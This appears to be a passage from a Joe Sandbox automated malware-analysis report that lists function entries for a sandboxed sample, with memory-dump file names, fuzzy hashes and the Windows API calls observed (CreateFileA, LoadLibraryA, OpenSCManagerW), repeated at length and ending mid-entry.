Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6397dea84beb74eaba3f7cd7d51b7ef9e901197f2f0d9cf5a4810e995834e823
Instruction ID: 688ba822999e8865d01b5430ff3182b5841d88ea661eae2c14063924445bb4d4
Opcode Fuzzy Hash: 6397dea84beb74eaba3f7cd7d51b7ef9e901197f2f0d9cf5a4810e995834e823
Instruction Fuzzy Hash: 442186FB5481157DF2018589AB65EFE6B6CF6C3738B30C87BF806C6542E1904E0A6331

Function 0054C9E8 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0054C9E8

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2a5597a0df5829b150b9437a8c6d61057963f776963dd5fe314bb93ea64d4035
Instruction ID: a127b6aac15527277849325ef6b47b3360131d6156b2d7b143cc721f1e3b55ab
Opcode Fuzzy Hash: 2a5597a0df5829b150b9437a8c6d61057963f776963dd5fe314bb93ea64d4035
Instruction Fuzzy Hash: 0B319EB3A0C314AFD351AE19EC41ABEFBE9EF94764F12492DE6C483600D73598408A97

Function 0054FB4A Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f27c4bc1fc80d6de2c75eb2731af965f7ef61653f85b7c2e512a0f07584dc065
Instruction ID: 9e407f6d2f2fd3de1dccc1c7073ef1b53a1c82c024f0d7ae1265776e174acbad
Opcode Fuzzy Hash: f27c4bc1fc80d6de2c75eb2731af965f7ef61653f85b7c2e512a0f07584dc065
Instruction Fuzzy Hash: 36111FFB2481157DB602C589AB65DFA6B6DF5C2738730CC3BF802C6542E2954E0E6231

Function 0054FB76 Relevance: 1.6, APIs: 1, Instructions: 96
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2cd44438e6332fb991511e13e1f9a17053e3ba681256b1e4ddf593e5eef151c5
Instruction ID: ebe5c4da9b52f76cac3be8cdd4d3f94d33d0345f6b3b80b7b4d359df39df5b74
Opcode Fuzzy Hash: 2cd44438e6332fb991511e13e1f9a17053e3ba681256b1e4ddf593e5eef151c5
Instruction Fuzzy Hash: DE11A2B764C2157DF6018A486A65EFA6B6CE7C2738B30887BF842C6442E1500D0A5231

Function 0054FBA9 Relevance: 1.6, APIs: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-284AAE83,0054FB37,00000003,00000000,00000003,?), ref: 0054FC22

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b914c0ec72643e787a853a908678e7337a7ffd78eca18a9a41c0e767269bf0c
Instruction ID: 8af3e9cf59fead921a112340270ed9896cc03376b1f9d4dcf10fa17164d42ff9
Opcode Fuzzy Hash: 5b914c0ec72643e787a853a908678e7337a7ffd78eca18a9a41c0e767269bf0c
Instruction Fuzzy Hash: C61160B714C11A7DF6058A49AE65EFA7B6CFAD2738B30C87EFC42C6542E2500D0A6335

Function 04C30D42 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04C30DCD

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: d0a467c294aa0b286e502613b3a0d1da5462a2774e06ac71d45d283d0a224407
Instruction ID: 1854ab1dc8dc800575a419579e84b22b04f0f3a6d5e9ffa1bb1ac3f7bf530949
Opcode Fuzzy Hash: d0a467c294aa0b286e502613b3a0d1da5462a2774e06ac71d45d283d0a224407
Instruction Fuzzy Hash: 4A2135B6C012089FCB10CF9AD884ADEFBF5FF89710F14811AD908AB209D774A641CFA4

Function 04C30D48 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04C30DCD

Memory Dump Source

Source File: 00000003.00000002.2413398780.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c30000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 76c22529b98ed70fb6b85517772ed22f8e55a08128211ed50a963f5221dcc99a
Instruction ID: 60aecd8e0fc613347b15851dfd9b40fef3fa82dc088c9944d1749f64e34cd27d
Opcode Fuzzy Hash: 76c22529b98ed70fb6b85517772ed22f8e55a08128211ed50a963f5221dcc99a
Instruction Fuzzy Hash: FD2138B6C012189FCB50DF9AD884ADEFBF5FF89710F14811AD908AB208D774A640CFA4

Function 0054F96E Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C752CC9F,00000003,00000000), ref: 0054FA01

Memory Dump Source

Source File: 00000003.00000002.2410439522.000000000054C000.00000040.00000001.01000000.00000006.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000003.00000002.2410169939.00000000003D0000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410212626.00000000003D6000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410232852.00000000003DA000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410254476.00000000003E6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410352178.0000000000538000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410372479.000000000053A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410398169.000000000054A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410419283.000000000054B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410439522.0000000000555000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410481058.000000000055D000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410500531.000000000055F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410520828.0000000000561000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410540532.0000000000562000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410560472.000000000056A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410580265.000000000056C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410599227.000000000056E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410618983.0000000000571000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410642224.0000000000586000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410686905.00000000005A8000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410708390.00000000005AD000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410729059.00000000005BC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410748551.00000000005BE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410768859.00000000005CB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410790174.00000000005CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410810700.00000000005CD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410830315.00000000005D3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410849397.00000000005D4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410868545.00000000005D6000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410888893.00000000005E2000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410907540.00000000005E3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410925804.00000000005E4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410946858.00000000005EB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410969050.00000000005FC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2410987941.00000000005FE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.0000000000656000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411024016.000000000065E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411067531.000000000066E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2411087241.0000000000670000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3d0000_02FQBW3AYVFKS8DMY3O.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 18f3260635597d2cdcf3505bed7e63d35a7799fd0774b478a6f128ea523841ec
Instruction ID: 8f3ddd066a00db296fa1798cd60819b4a055bbaaeae697e17d5038f5c65d3fc2
Opcode Fuzzy Hash: 18f3260635597d2cdcf3505bed7e63d35a7799fd0774b478a6f128ea523841ec
Instruction Fuzzy Hash: 7F01DFB32883157EE6018A185E55BFA7AADFBC2734F30843EF9018A482D3A14D0A3231

Function 04C31509 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

